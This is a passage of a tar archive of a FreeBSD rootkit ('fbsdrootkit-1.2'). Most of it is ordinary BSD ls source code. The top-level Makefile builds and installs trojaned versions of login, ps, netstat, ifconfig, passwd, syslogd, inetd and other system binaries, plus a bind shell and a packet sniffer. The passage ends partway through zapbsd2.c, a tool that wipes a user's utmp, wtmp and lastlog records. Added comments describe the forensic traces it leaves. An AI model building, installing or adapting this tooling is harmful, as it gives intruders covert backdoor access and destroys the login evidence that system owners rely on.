			chcnt += printaname(array[base], dp->s_inode,
			    dp->s_block);
			if ((base += numrows) >= num)
				break;
			while ((cnt = ((chcnt + TAB) & ~(TAB - 1))) <= endcol){
				(void)putchar('\t');
				chcnt = cnt;
			}
			endcol += colwidth;
		}
		(void)putchar('\n');
	}
}

/*
 * print [inode] [size] name
 * return # of characters printed, no trailing characters.
*/
/*
 * inodefield and sizefield are the field widths for the optional inode
 * and block-count columns; a type character is appended under -F.
 */
static int
printaname(p, inodefield, sizefield)
	FTSENT *p;
	u_long sizefield, inodefield;
{
	struct stat *sp;
	int chcnt;

	sp = p->fts_statp;
	chcnt = 0;
	if (f_inode)
		chcnt += printf("%*lu ", (int)inodefield, sp->st_ino);
	if (f_size)
		chcnt += printf("%*qd ",
		    (int)sizefield, howmany(sp->st_blocks, blocksize));
	chcnt += printf("%s", p->fts_name);
	if (f_type)
		chcnt += printtype(sp->st_mode);
	return (chcnt);
}

/*
 * printtime --
 *	Print the timestamp column for ftime followed by a space.  The
 *	time is formatted once with strftime("%c") and pieces of that
 *	string are emitted by position: 4..10 always, then 11..23 under
 *	-T, 11..15 when ftime is less than SIXMONTHS in the past, or a
 *	space and 20..23 otherwise.
 *
 *	NOTE(review): the fixed offsets assume the "%c" layout of the
 *	default locale (weekday, month, day, time, four-digit year) --
 *	confirm before building with another locale.  The results of
 *	strftime() and localtime() are not checked, so on failure the
 *	loops read whatever longstring holds.
 */
static void
printtime(ftime)
	time_t ftime;
{
	int i;
	char longstring[80];

	strftime(longstring, sizeof(longstring), "%c", localtime(&ftime));
	for (i = 4; i < 11; ++i)
		(void)putchar(longstring[i]);

#define	SIXMONTHS	((365 / 2) * 86400)
	if (f_sectime)
		for (i = 11; i < 24; i++)
			(void)putchar(longstring[i]);
	else if (ftime + SIXMONTHS > time(NULL))
		for (i = 11; i < 16; ++i)
			(void)putchar(longstring[i]);
	else {
		(void)putchar(' ');
		for (i = 20; i < 24; ++i)
			(void)putchar(longstring[i]);
	}
	(void)putchar(' ');
}

/*
 * printtype --
 *	Print the -F suffix for mode: '/' directory, '|' FIFO, '@' symbolic
 *	link, '=' socket, or '*' when any execute bit is set.  Returns the
 *	number of characters printed (1 or 0).
 */
static int
printtype(mode)
	u_int mode;
{
	switch (mode & S_IFMT) {
	case S_IFDIR:
		(void)putchar('/');
		return (1);
	case S_IFIFO:
		(void)putchar('|');
		return (1);
	case S_IFLNK:
		(void)putchar('@');
		return (1);
	case S_IFSOCK:
		(void)putchar('=');
		return (1);
	}
	if (mode & (S_IXUSR | S_IXGRP | S_IXOTH)) {
		(void)putchar('*');
		return (1);
	}
	return (0);
}

/*
 * printlink --
 *	Print " -> target" for the symbolic link p.  The path handed to
 *	readlink() is the bare name for operands and parent access path
 *	plus name otherwise.  On failure a message goes to stderr and
 *	nothing is appended.
 */
static void
printlink(p)
	FTSENT *p;
{
	int lnklen;
	char name[MAXPATHLEN + 1], path[MAXPATHLEN + 1];

	if (p->fts_level == FTS_ROOTLEVEL)
		(void)snprintf(name, sizeof(name), "%s", p->fts_name);
	else
		(void)snprintf(name, sizeof(name),
		    "%s/%s", p->fts_parent->fts_accpath, p->fts_name);
	/* readlink() does not terminate; one byte is kept back for the NUL. */
	if ((lnklen = readlink(name, path, sizeof(path) - 1)) == -1) {
		(void)fprintf(stderr, "\nls: %s: %s\n", name, strerror(errno));
		return;
	}
	path[lnklen] = '\0';
	(void)printf(" -> %s", path);
}
fbsdrootkit-1.2/ls/stat_flags.c100600 764 764 10224 5640712475 14075 0ustar dfdf/*- * Copyright (c) 1993 * The Regents of the University of California. All rights reserved.
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $Id: stat_flags.c,v 1.2 1994/09/24 02:55:57 davidg Exp $ */

#ifndef lint
static char sccsid[] = "@(#)stat_flags.c 8.1 (Berkeley) 5/31/93";
#endif /* not lint */

/* NOTE(review): the header names of the next four directives were lost in extraction. */
#include
#include
#include
#include

/*
 * Append s to the local buffer "string", preceded by "prefix" when one is
 * set, then make "," the prefix for whatever is appended next.  Relies on
 * locals named string and prefix at the point of use.
 */
#define	SAPPEND(s) {							\
	if (prefix != NULL)						\
		(void)strcat(string, prefix);				\
	(void)strcat(string, s);					\
	prefix = ",";							\
}

/*
 * flags_to_string --
 *	Convert stat flags to a comma-separated string.  If no flags
 *	are set, return the default string.
 *
 *	The result is built in a static buffer, so it is overwritten by
 *	the next call; callers that keep it must copy it.  When no flag is
 *	set and def is NULL the empty string is returned.
 */
char *
flags_to_string(flags, def)
	u_long flags;
	char *def;
{
	static char string[128];
	char *prefix;

	string[0] = '\0';
	prefix = NULL;
	if (flags & UF_APPEND)
		SAPPEND("uappnd");
	if (flags & UF_IMMUTABLE)
		SAPPEND("uchg");
	if (flags & UF_NODUMP)
		SAPPEND("nodump");
	if (flags & SF_APPEND)
		SAPPEND("sappnd");
	if (flags & SF_ARCHIVED)
		SAPPEND("arch");
	if (flags & SF_IMMUTABLE)
		SAPPEND("schg");
	/* prefix stays NULL only when nothing was appended. */
	return (prefix == NULL && def != NULL ? def : string);
}

/*
 * Compare token a with the literal b, terminating NUL included, and on a
 * match OR flag f into *clrp (when clear is set) or *setp, then break out
 * of the enclosing switch.  Relies on locals named clear, clrp and setp.
 *
 * NOTE(review): memcmp() is asked for sizeof(b) bytes of a, which can be
 * more than the token holds when the token is shorter than the literal.
 */
#define	TEST(a, b, f) {							\
	if (!memcmp(a, b, sizeof(b))) {					\
		if (clear) {						\
			if (clrp)					\
				*clrp |= (f);				\
		} else if (setp)					\
			*setp |= (f);					\
		break;							\
	}								\
}

/*
 * string_to_flags --
 *	Take string of arguments and return stat flags.  Return 0 on
 *	success, 1 on failure.  On failure, stringp is set to point
 *	to the offending token.
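*/
/*
 * Implementation notes:
 *	- The input string is split in place by strsep() on tab, space and
 *	  comma; empty tokens are skipped.
 *	- A leading "no" negates a name.  "dump" is inverted because the
 *	  underlying bit is UF_NODUMP: "nodump" sets it, "dump" clears it.
 *	- The negation state is reset for every token, so a "no" prefix on
 *	  one name cannot leak into the names that follow it.
 *	- Names are matched with strcmp(), which stops at the token's own
 *	  terminator instead of reading a fixed number of bytes from it.
 *	- Either of setp and clrp may be NULL; bits for a NULL pointer are
 *	  dropped.
 */
int
string_to_flags(stringp, setp, clrp)
	char **stringp;
	u_long *setp, *clrp;
{
	static const struct {
		const char *name;	/* name with any "no" prefix removed */
		u_long flag;
		int inverted;		/* plain name clears, "no" form sets */
	} known[] = {
		{ "arch",	SF_ARCHIVED,	0 },
		{ "archived",	SF_ARCHIVED,	0 },
		{ "dump",	UF_NODUMP,	1 },
		{ "sappnd",	SF_APPEND,	0 },
		{ "sappend",	SF_APPEND,	0 },
		{ "schg",	SF_IMMUTABLE,	0 },
		{ "schange",	SF_IMMUTABLE,	0 },
		{ "simmutable",	SF_IMMUTABLE,	0 },
		{ "uappnd",	UF_APPEND,	0 },
		{ "uappend",	UF_APPEND,	0 },
		{ "uchg",	UF_IMMUTABLE,	0 },
		{ "uchange",	UF_IMMUTABLE,	0 },
		{ "uimmutable",	UF_IMMUTABLE,	0 },
	};
	char *string, *p;
	size_t i, nknown;
	int clear;

	nknown = sizeof(known) / sizeof(known[0]);

	if (setp)
		*setp = 0;
	if (clrp)
		*clrp = 0;
	string = *stringp;

	while ((p = strsep(&string, "\t ,")) != NULL) {
		/* Remember the token start so a failure points at it. */
		*stringp = p;
		if (*p == '\0')
			continue;

		clear = 0;
		if (p[0] == 'n' && p[1] == 'o') {
			clear = 1;
			p += 2;
		}

		for (i = 0; i < nknown; i++)
			if (strcmp(p, known[i].name) == 0)
				break;
		if (i == nknown)
			return (1);

		if (known[i].inverted)
			clear = !clear;
		if (clear) {
			if (clrp)
				*clrp |= known[i].flag;
		} else if (setp)
			*setp |= known[i].flag;
	}
	return (0);
}
fbsdrootkit-1.2/ls/util.c100600 764 764 4707 6155174045 12711 0ustar dfdf/*
 * Copyright (c) 1989, 1993, 1994
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * Michael Fischbein.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4.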
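Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 * $Id: util.c,v 1.4.6.2 1996/06/05 02:35:42 jkh Exp $
 */

#ifndef lint
static char sccsid[] = "@(#)util.c 8.3 (Berkeley) 4/2/94";
#endif /* not lint */

/* NOTE(review): the header names of these six #include lines are missing in this copy. */
#include
#include
#include
#include
#include
#include
#include "ls.h"
#include "extern.h"

/*
 * prcopy --
 *	Copy `len' bytes from `src' to `dest', replacing every byte that
 *	isprint() rejects with '?'.  `src' and `dest' may be the same
 *	buffer.  No terminator is written; a `len' of zero or less copies
 *	nothing.
 */
void
prcopy(src, dest, len)
	char *src, *dest;
	int len;
{
	int ch;

	while (len-- > 0) {
		/*
		 * isprint() is only defined for EOF and values that fit in
		 * an unsigned char, so bytes with the high bit set must not
		 * reach it as negative numbers.
		 */
		ch = (unsigned char)*src++;
		*dest++ = isprint(ch) ? ch : '?';
	}
}

/*
 * usage --
 *	Print the option summary on stderr and exit with status 1.
 */
void
usage()
{
	(void)fprintf(stderr, "usage: ls [-1ACFLRTacdfiklqrstu] [file ...]\n");
	exit(1);
}
fbsdrootkit-1.2/ls/ls.c.dist100600 764 764 32166 6247420102 13322 0ustar dfdf/*
 * Copyright (c) 1989, 1993, 1994
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * Michael Fischbein.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2.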
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ls.c,v 1.6.4.2 1996/06/05 02:35:41 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. 
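All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)ls.c 8.5 (Berkeley) 4/2/94";
#endif /* not lint */

/* NOTE(review): the header names of these eleven #include lines are missing in this copy. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "ls.h"
#include "extern.h"

static void	 display __P((FTSENT *, FTSENT *));
static int	 mastercmp __P((const FTSENT **, const FTSENT **));
static void	 traverse __P((int, char **, int));

/* Output and ordering routines chosen once in main() from the options. */
static void (*printfcn) __P((DISPLAY *));
static int (*sortfcn) __P((const FTSENT *, const FTSENT *));

long blocksize;			/* block size units */
int termwidth = 80;		/* default terminal width */

/* flags */
int f_accesstime;		/* use time of last access */
int f_column;			/* columnated format */
int f_flags;			/* show flags associated with a file */
int f_inode;			/* print inode */
int f_kblocks;			/* print size in kilobytes */
int f_listdir;			/* list actual directory, not contents */
int f_listdot;			/* list files beginning with . */
int f_longform;			/* long listing format */
int f_newline;			/* if precede with newline */
int f_nonprint;			/* show unprintables as ? */
int f_nosort;			/* don't sort output */
int f_recursive;		/* ls subdirectories also */
int f_reversesort;		/* reverse whatever sort is used */
int f_sectime;			/* print the real time for all files */
int f_singlecol;		/* use single column output */
int f_size;			/* list size in short listing */
int f_statustime;		/* use time of last mode change */
int f_dirname;			/* if precede with directory name */
int f_timesort;			/* sort by time vice name */
int f_type;			/* add type character for non-regular files */

/*
 * main --
 *	Work out the output defaults from the kind of stdout, parse the
 *	options into the f_* flags and the fts(3) option word, pick the sort
 *	and print routines, then hand the operands (or "." when there are
 *	none) to traverse().  Exits 0 unless usage() or err() exits first.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	static char dot[] = ".", *dotav[] = { dot, NULL };
	struct winsize win;
	int ch, fts_options, notused;
	char *p;

	/*
	 * Terminal defaults to -Cq, non-terminal defaults to -1.
	 *
	 * NOTE(review): the COLUMNS value goes through atoi() without a
	 * range check; confirm that the consumers of termwidth tolerate
	 * zero and negative widths.
	 */
	if (isatty(STDOUT_FILENO)) {
		if (ioctl(STDOUT_FILENO, TIOCGWINSZ, &win) == -1 ||
		    !win.ws_col) {
			if ((p = getenv("COLUMNS")) != NULL)
				termwidth = atoi(p);
		}
		else
			termwidth = win.ws_col;
		f_column = f_nonprint = 1;
	} else {
		f_singlecol = 1;
		/* retrieve environment variable, in case of explicit -C */
		if ((p = getenv("COLUMNS")))
			termwidth = atoi(p);
	}

	/* Root is -A automatically. */
	if (!getuid())
		f_listdot = 1;

	fts_options = FTS_PHYSICAL;
	while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu")) != EOF) {
		switch (ch) {
		/*
		 * The -1, -C and -l options all override each other so shell
		 * aliasing works right.
		 */
		case '1':
			f_singlecol = 1;
			f_column = f_longform = 0;
			break;
		case 'C':
			f_column = 1;
			f_longform = f_singlecol = 0;
			break;
		case 'l':
			f_longform = 1;
			f_column = f_singlecol = 0;
			break;
		/* The -c and -u options override each other. */
		case 'c':
			f_statustime = 1;
			f_accesstime = 0;
			break;
		case 'u':
			f_accesstime = 1;
			f_statustime = 0;
			break;
		case 'F':
			f_type = 1;
			break;
		case 'L':
			fts_options &= ~FTS_PHYSICAL;
			fts_options |= FTS_LOGICAL;
			break;
		case 'R':
			f_recursive = 1;
			break;
		case 'a':
			fts_options |= FTS_SEEDOT;
			/* FALLTHROUGH */
		case 'A':
			f_listdot = 1;
			break;
		/* The -d option turns off the -R option. */
		case 'd':
			f_listdir = 1;
			f_recursive = 0;
			break;
		case 'f':
			f_nosort = 1;
			break;
		case 'g':		/* Compatibility with 4.3BSD. */
			break;
		case 'i':
			f_inode = 1;
			break;
		case 'k':
			f_kblocks = 1;
			break;
		case 'o':
			f_flags = 1;
			break;
		case 'q':
			f_nonprint = 1;
			break;
		case 'r':
			f_reversesort = 1;
			break;
		case 's':
			f_size = 1;
			break;
		case 'T':
			f_sectime = 1;
			break;
		case 't':
			f_timesort = 1;
			break;
		default:
		case '?':
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/*
	 * If not -F, -i, -l, -s or -t options, don't require stat
	 * information.
	 */
	if (!f_inode && !f_longform && !f_size && !f_timesort && !f_type)
		fts_options |= FTS_NOSTAT;

	/*
	 * If not -F, -d or -l options, follow any symbolic links listed on
	 * the command line.
	 */
	if (!f_longform && !f_listdir && !f_type)
		fts_options |= FTS_COMFOLLOW;

	/* If -l or -s, figure out block size. */
	if (f_longform || f_size) {
		if (f_kblocks)
			blocksize = 2;
		else {
			(void)getbsize(&notused, &blocksize);
			blocksize /= 512;
		}
	}

	/* Select a sort function. */
	if (f_reversesort) {
		if (!f_timesort)
			sortfcn = revnamecmp;
		else if (f_accesstime)
			sortfcn = revacccmp;
		else if (f_statustime)
			sortfcn = revstatcmp;
		else /* Use modification time. */
			sortfcn = revmodcmp;
	} else {
		if (!f_timesort)
			sortfcn = namecmp;
		else if (f_accesstime)
			sortfcn = acccmp;
		else if (f_statustime)
			sortfcn = statcmp;
		else /* Use modification time. */
			sortfcn = modcmp;
	}

	/* Select a print function. */
	if (f_singlecol)
		printfcn = printscol;
	else if (f_longform)
		printfcn = printlong;
	else
		printfcn = printcol;

	if (argc)
		traverse(argc, argv, fts_options);
	else
		traverse(1, dotav, fts_options);
	exit(0);
}

static int output;			/* If anything output. */

/*
 * Traverse() walks the logical directory structure specified by the argv list
 * in the order specified by the mastercmp() comparison function.  During the
 * traversal it passes linked lists of structures to display() which represent
 * a superset (may be exact set) of the files to be displayed.
 */
static void
traverse(argc, argv, options)
	int argc, options;
	char *argv[];
{
	FTS *ftsp;
	FTSENT *p, *chp;
	int ch_options;

	if ((ftsp =
	    fts_open(argv, options, f_nosort ? NULL : mastercmp)) == NULL)
		err(1, NULL);

	/* First pass: the operands themselves (display() gets p == NULL). */
	display(NULL, fts_children(ftsp, 0));
	if (f_listdir)
		return;

	/*
	 * If not recursing down this tree and don't need stat info, just get
	 * the names.
	 */
	ch_options = !f_recursive && options & FTS_NOSTAT ? FTS_NAMEONLY : 0;

	while ((p = fts_read(ftsp)) != NULL)
		switch (p->fts_info) {
		case FTS_DC:
			warnx("%s: directory causes a cycle", p->fts_name);
			break;
		case FTS_DNR:
		case FTS_ERR:
			warnx("%s: %s", p->fts_name, strerror(p->fts_errno));
			break;
		case FTS_D:
			/* Below the operands, dot directories need -a/-A. */
			if (p->fts_level != FTS_ROOTLEVEL &&
			    p->fts_name[0] == '.' && !f_listdot)
				break;

			/*
			 * If already output something, put out a newline as
			 * a separator.  If multiple arguments, precede each
			 * directory with its name.
			 */
			if (output)
				(void)printf("\n%s:\n", p->fts_path);
			else if (argc > 1) {
				(void)printf("%s:\n", p->fts_path);
				output = 1;
			}

			chp = fts_children(ftsp, ch_options);
			display(p, chp);

			/* Without -R the children are listed but not entered. */
			if (!f_recursive && chp != NULL)
				(void)fts_set(ftsp, p, FTS_SKIP);
			break;
		}
	if (errno)
		err(1, "fts_read");
}

/*
 * Display() takes a linked list of FTSENT structures and passes the list
 * along with any other necessary information to the print function.  P
 * points to the parent directory of the display list.
 */
static void
display(p, list)
	FTSENT *p, *list;
{
	struct stat *sp;
	DISPLAY d;
	FTSENT *cur;
	NAMES *np;
	u_quad_t maxsize;
	u_long btotal, maxblock, maxinode, maxlen, maxnlink;
	int bcfile, flen, glen, ulen, maxflags, maxgroup, maxuser;
	int entries, needstats;
	char *user, *group, *flags, buf[20];	/* 32 bits == 10 digits */

	/*
	 * If list is NULL there are two possibilities: that the parent
	 * directory p has no children, or that fts_children() returned an
	 * error.  We ignore the error case since it will be replicated
	 * on the next call to fts_read() on the post-order visit to the
	 * directory p, and will be signalled in traverse().
	 */
	if (list == NULL)
		return;

	needstats = f_inode || f_longform || f_size;
	flen = 0;
	btotal = maxblock = maxinode = maxlen = maxnlink = 0;
	bcfile = 0;
	maxuser = maxgroup = maxflags = 0;
	flags = NULL;
	maxsize = 0;
	for (cur = list, entries = 0; cur; cur = cur->fts_link) {
		if (cur->fts_info == FTS_ERR || cur->fts_info == FTS_NS) {
			warnx("%s: %s",
			    cur->fts_name, strerror(cur->fts_errno));
			cur->fts_number = NO_PRINT;
			continue;
		}

		/*
		 * P is NULL if list is the argv list, to which different rules
		 * apply.
		 */
		if (p == NULL) {
			/* Directories will be displayed later. */
			if (cur->fts_info == FTS_D && !f_listdir) {
				cur->fts_number = NO_PRINT;
				continue;
			}
		} else {
			/* Only display dot file if -a/-A set. */
			if (cur->fts_name[0] == '.' && !f_listdot) {
				cur->fts_number = NO_PRINT;
				continue;
			}
		}
		/* Sanitize the name in place before it is measured or printed. */
		if (f_nonprint)
			prcopy(cur->fts_name, cur->fts_name, cur->fts_namelen);
		if (cur->fts_namelen > maxlen)
			maxlen = cur->fts_namelen;
		if (needstats) {
			sp = cur->fts_statp;
			if (sp->st_blocks > maxblock)
				maxblock = sp->st_blocks;
			if (sp->st_ino > maxinode)
				maxinode = sp->st_ino;
			if (sp->st_nlink > maxnlink)
				maxnlink = sp->st_nlink;
			if (sp->st_size > maxsize)
				maxsize = sp->st_size;

			btotal += sp->st_blocks;
			if (f_longform) {
				user = user_from_uid(sp->st_uid, 0);
				if ((ulen = strlen(user)) > maxuser)
					maxuser = ulen;
				group = group_from_gid(sp->st_gid, 0);
				if ((glen = strlen(group)) > maxgroup)
					maxgroup = glen;
				if (f_flags) {
					flags =
					    flags_to_string(sp->st_flags, "-");
					if ((flen = strlen(flags)) > maxflags)
						maxflags = flen;
				} else
					flen = 0;

				/*
				 * One allocation holds the NAMES header and
				 * the three strings; the +3 covers their
				 * terminators.
				 */
				if ((np = malloc(sizeof(NAMES) +
				    ulen + glen + flen + 3)) == NULL)
					err(1, NULL);

				np->user = &np->data[0];
				(void)strcpy(np->user, user);
				np->group = &np->data[ulen + 1];
				(void)strcpy(np->group, group);

				if (S_ISCHR(sp->st_mode) ||
				    S_ISBLK(sp->st_mode))
					bcfile = 1;

				if (f_flags) {
					np->flags = &np->data[ulen + glen + 2];
					(void)strcpy(np->flags, flags);
				}
				cur->fts_pointer = np;
			}
		}
		++entries;
	}

	if (!entries)
		return;

	d.list = list;
	d.entries = entries;
	d.maxlen = maxlen;
	if (needstats) {
		d.bcfile = bcfile;
		d.btotal = btotal;
		/* Column widths are the printed lengths of the largest values. */
		(void)snprintf(buf, sizeof(buf), "%lu", maxblock);
		d.s_block = strlen(buf);
		d.s_flags = maxflags;
		d.s_group = maxgroup;
		(void)snprintf(buf, sizeof(buf), "%lu", maxinode);
		d.s_inode = strlen(buf);
		(void)snprintf(buf, sizeof(buf), "%lu", maxnlink);
		d.s_nlink = strlen(buf);
		(void)snprintf(buf, sizeof(buf), "%qu", maxsize);
		d.s_size = strlen(buf);
		d.s_user = maxuser;
	}

	printfcn(&d);
	output = 1;

	if (f_longform)
		for (cur = list; cur; cur = cur->fts_link)
			free(cur->fts_pointer);
}

/*
 * Ordering for mastercmp:
 * If ordering the argv (fts_level = FTS_ROOTLEVEL) return non-directories
 * as larger than directories.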
Within either group, use the sort function.
 * All other levels use the sort function.  Error entries remain unsorted.
 */
/*
 * mastercmp --
 *	Comparison routine passed to fts_open() by traverse().  Returns 0 as
 *	soon as either entry is FTS_ERR, compares by name when either entry
 *	is FTS_NS, and otherwise defers to the selected sortfcn, except that
 *	at the root level an entry of type FTS_D compares as larger than an
 *	entry of any other type.
 */
static int
mastercmp(a, b)
	const FTSENT **a, **b;
{
	const FTSENT *lhs, *rhs;
	int lkind, rkind;

	lhs = *a;
	rhs = *b;
	lkind = lhs->fts_info;
	rkind = rhs->fts_info;

	if (lkind == FTS_ERR || rkind == FTS_ERR)
		return (0);

	if (lkind == FTS_NS || rkind == FTS_NS)
		return (namecmp(lhs, rhs));

	/* Operands of different kinds: the directory side decides. */
	if (lkind != rkind && lhs->fts_level == FTS_ROOTLEVEL) {
		if (lkind == FTS_D)
			return (1);
		if (rkind == FTS_D)
			return (-1);
	}
	return (sortfcn(lhs, rhs));
}
fbsdrootkit-1.2/ls/Makefile.dist100600 764 764 253 6257406031 14136 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.2 1994/09/24 02:55:51 davidg Exp $ PROG= ls SRCS= cmp.c stat_flags.c ls.c print.c util.c .include
fbsdrootkit-1.2/Makefile100600 764 764 1622 6273036332 12600 0ustar dfdfSUB=chpass inetd login ls du netstat ifconfig passwd ps rshd syslogd PATHS=/bin/ls /usr/bin/chpass /usr/bin/login /usr/bin/passwd /bin/ps /usr/libexec/rshd /usr/bin/netstat /sbin/ifconfig /usr/sbin/syslogd /usr/sbin/inetd FIX=fix ADLEN=addlen ZAP=zapbsd2 BSHELL=bindshell UTILS=$(FIX) $(ADLEN) $(ZAP) $(BSHELL) SNIFFIT=sniffit.0.3.3 TRIPWIRE=tripwire-1.2 DISTFILE=frk1.1 all: $(UTILS) cd $(SNIFFIT); make freebsd; cd .. for i in $(SUB); do cd $$i; make; strip $$i; cd ..; done $(FIX): $(FIX).o $(CC) -o $@ $(FIX).o $(ADLEN): $(ADLEN).o $(CC) -o $@ $(FIX).o $(ZAP): $(ZAP).o $(CC) -o $@ $(ZAP).o $(BSHELL): $(BSHELL).o $(CC) -o $@ $(BSHELL).o install: @install.sh $(PATHS) clean: rm -f $(UTILS) *.o cd $(SNIFFIT); make clean; cd .. for i in $(SUB); do cd $$i; make clean; cd ..; done dist: @dist.sh $(DISTFILE) tripwire: @dotrip.sh $(PATHS) tripwire-inst: cd $(TRIPWIRE); make rootkit; cd ..
fbsdrootkit-1.2/zapbsd2.c100600 764 764 2302 6266057610 12651 0ustar dfdf
/*
 * zapbsd2 -- the login-record tampering tool of this archive.
 *
 * Given one account name (argv[1]) it overwrites that account's records in
 * the utmp, wtmp and lastlog files with 0xFF bytes.  Records are overwritten
 * in place rather than removed, so the files keep their length.
 *
 * Forensic notes: fixed-size records in these files that consist entirely of
 * 0xFF bytes are the artifact this code leaves behind.  Only the three local
 * files named below are opened, so login accounting kept on another host can
 * be compared against them.
 *
 * NOTE(review): the header names of the six #include lines below are missing
 * in this copy.  ERR, USAGE and BASENAME are not defined here; presumably
 * they come from rootkitutil.h.
 */
#include
#include
#include
#include
#include
#include
#include "rootkitutil.h"

#define RK_USER argv[1]			/* account whose records are overwritten */
#define RK_UTMP _PATH_UTMP
#define RK_WTMP _PATH_WTMP
#define RK_LASTLOG _PATH_LASTLOG
#define GET_UID(a) getpwnam(a)->pw_uid	/* getpwnam() result is used unchecked */

/* Cleaned up for the FreeBSD rootkit */

/*
 * kill_lastlog --
 *	Overwrite the lastlog record of uid `u'.  The record is addressed
 *	as u * sizeof(struct lastlog) from the start of the file and is
 *	replaced by one struct filled with 0xFF bytes.
 */
kill_lastlog(uid_t u)
{
	struct lastlog newll;
	int fd;

	if((fd=open(RK_LASTLOG,O_RDWR))<0)
		ERR("open")
	lseek(fd,u*sizeof(struct lastlog),SEEK_SET);
	memset(&newll,0xFF,sizeof(newll));
	if(write(fd,&newll,sizeof(newll))<0)
		ERR("write")
	close(fd);
}

/*
 * kill_tmp --
 *	Read the utmp-format file `name' one struct utmp at a time and
 *	overwrite, in place, every record whose ut_name matches `who' with
 *	0xFF bytes.
 *
 *	The comparison covers only strlen(who) bytes, so a record whose
 *	ut_name merely starts with `who' matches as well; records of other
 *	accounts sharing that prefix are overwritten too.
 */
kill_tmp(char *name,char *who)
{
	int f;
	struct utmp utmp_ent;

	if((f=open(name,O_RDWR))<0)
		ERR("open")
